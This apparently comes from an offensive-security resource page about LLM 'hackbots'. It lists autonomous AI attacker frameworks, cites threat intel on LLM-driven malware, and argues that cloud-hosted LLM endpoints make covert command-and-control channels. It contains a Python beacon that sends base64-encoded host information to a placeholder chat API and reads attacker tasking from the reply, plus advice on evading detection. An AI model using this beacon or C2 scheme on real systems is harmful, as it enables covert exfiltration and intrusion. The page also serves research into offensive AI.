## **PoC**

### 1 click deploy or similar

The three leading incumbents as of 7/2/2025 for hackbots are:

- [Incalmo](https://github.com/bsinger98/Incalmo) - an autonomous LLM-based multi-stage attacker, by [bsinger98](https://github.com/bsinger98)
- [cai](https://github.com/aliasrobotics/cai) - Bug Bounty AI, features agent coordination and an execution architecture, by [AliasRobotics](https://github.com/aliasrobotics)
- [Rigging](https://rigging.dreadnode.io/) by [dreadnode](https://www.dreadnode.io/) - highly customizable, with the best data architecture in my opinion

If you do not require the capabilities of your own Python agents, consider [Nerve](https://github.com/evilsocket/nerve) by [evilsocket](https://x.com/evilsocket), which can be configured with YAML only.

### Frameworks

- [Langchain](https://python.langchain.com/docs/get_started/introduction/) is the incumbent; however, for offsec purposes consider [Rigging](https://rigging.dreadnode.io/). It is built by [dreadnode](https://www.dreadnode.io/), an offensive-AI company.
- [artkit](https://github.com/BCG-X-Official/artkit) - automated prompt-based testing and evaluation of GenAI applications, under active maintenance as of 10/24.
- [haystack](https://github.com/deepset-ai/haystack) is another alternative general-purpose component connector.

## **Details**

Interaction frameworks are designed to connect components like models, vector DBs, and file conversion utilities into pipelines (sometimes called prompt plumbing), with agents to interact with your data. A minimal pipeline sketch appears at the end of this section.

- [Langchain docs](https://python.langchain.com/docs/get_started/introduction/)
- [Rigging presentation](https://github.com/dreadnode/conferences/blob/main/SOCON_2024/Ghosts%20on%20the%20Node.pdf)
- [Incalmo paper](https://arxiv.org/abs/2501.16466) - assessing the capabilities of H1 2025 frontier models in offensive use cases:

> Offensive high-level actions through expert agents. In 9 out of 10 networks in MHBench, LLMs using Incalmo achieve at least some of the attack goals.

Note: As of 7/2/2025 MHBench is not public.

## Threat Intel

LLMs are beginning to be used in operational settings as of 7/23/2025. The practicality of these techniques changes continuously with model improvements. The latest development is APT28 being identified using [LLMs to program malware as needed on the local machine](https://www.csoonline.com/article/4025139/novel-malware-from-russias-apt28-prompts-llms-to-create-malicious-windows-commands.html), rather than delivering all capabilities up front - malware known as LAMEHUG.

As [moo_hax](https://x.com/moo_hax/) put it simply: "*where there is compute, there is c2*".

LLMs are covert channels. [This paper](https://arxiv.org/abs/2405.15652) from 2024 showed that whilst models like Llama-7B achieve low practical bitrates, the **opportunity to detect their usage was also low.** As we know, much better small models are coming online all the time, and their capabilities on tasks that involve constructive proofs (like many classes of vulnerabilities) continuously improve.

C2 to trusted endpoints hosting LLMs is a new challenge for us to face: host your LLM or C2 channel on Databricks, HuggingFace, AzureML, Vertex, etc., and you can obtain remote capabilities without challenges like domain categorization and, to an extent, transparent proxying - the traffic should blend right in with existing multi-turn conversations. A sketch of such a channel follows below.

Basic LLMs for C2 usage can be found at [testllm-c2](https://huggingface.co/tensorblock/testllm-c2-GGUF) by [Kiddz](https://huggingface.co/Kiddyz).
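To make the covert channel idea concrete, here is a minimal sketch of a beacon that rides on a hosted chat-completions API. The endpoint URL, API key, model name, and tasking convention are all hypothetical and invented for illustration; any OpenAI-compatible endpoint on a trusted SaaS platform would look the same on the wire.

```python
# Sketch of a covert tasking channel riding on a hosted chat-completions API.
# HYPOTHETICAL: the endpoint, key, model name, and tasking convention below are
# placeholders; the point is that the traffic is indistinguishable from a
# normal multi-turn chat conversation to proxies and domain-categorization.
import base64
import requests

ENDPOINT = "https://example-workspace.cloudprovider.com/v1/chat/completions"
API_KEY = "REDACTED"


def beacon(host_info: str) -> str:
    """Exfiltrate host_info inside an innocuous-looking prompt and read
    operator tasking back out of the model's reply."""
    blob = base64.b64encode(host_info.encode()).decode()
    resp = requests.post(
        ENDPOINT,
        headers={"Authorization": f"Bearer {API_KEY}"},
        json={
            "model": "ops-assistant",  # hypothetical fine-tune that relays tasking
            "messages": [
                # To an inspecting proxy this is just another chat turn.
                {"role": "user", "content": f"Review this config dump: {blob}"}
            ],
        },
        timeout=30,
    )
    # Standard OpenAI-compatible response shape; the "advice" text carries tasking.
    return resp.json()["choices"][0]["message"]["content"]
```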
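Finally, returning to the interaction frameworks described under Details, here is a minimal sketch of "prompt plumbing" using Langchain's expression language: a prompt template piped into a model, piped into an output parser. The model choice and the recon snippet are placeholders; swapping any one component does not touch the rest of the pipeline.

```python
# Minimal "prompt plumbing": template -> model -> parser, composed with `|`.
from langchain_core.output_parsers import StrOutputParser
from langchain_core.prompts import ChatPromptTemplate
from langchain_openai import ChatOpenAI

prompt = ChatPromptTemplate.from_template(
    "Summarize the following recon output in three bullet points:\n{recon}"
)
model = ChatOpenAI(model="gpt-4o-mini")  # placeholder; any chat model works
chain = prompt | model | StrOutputParser()  # the pipeline itself

print(chain.invoke({"recon": "open ports: 22, 80, 443; banner: nginx 1.18"}))
```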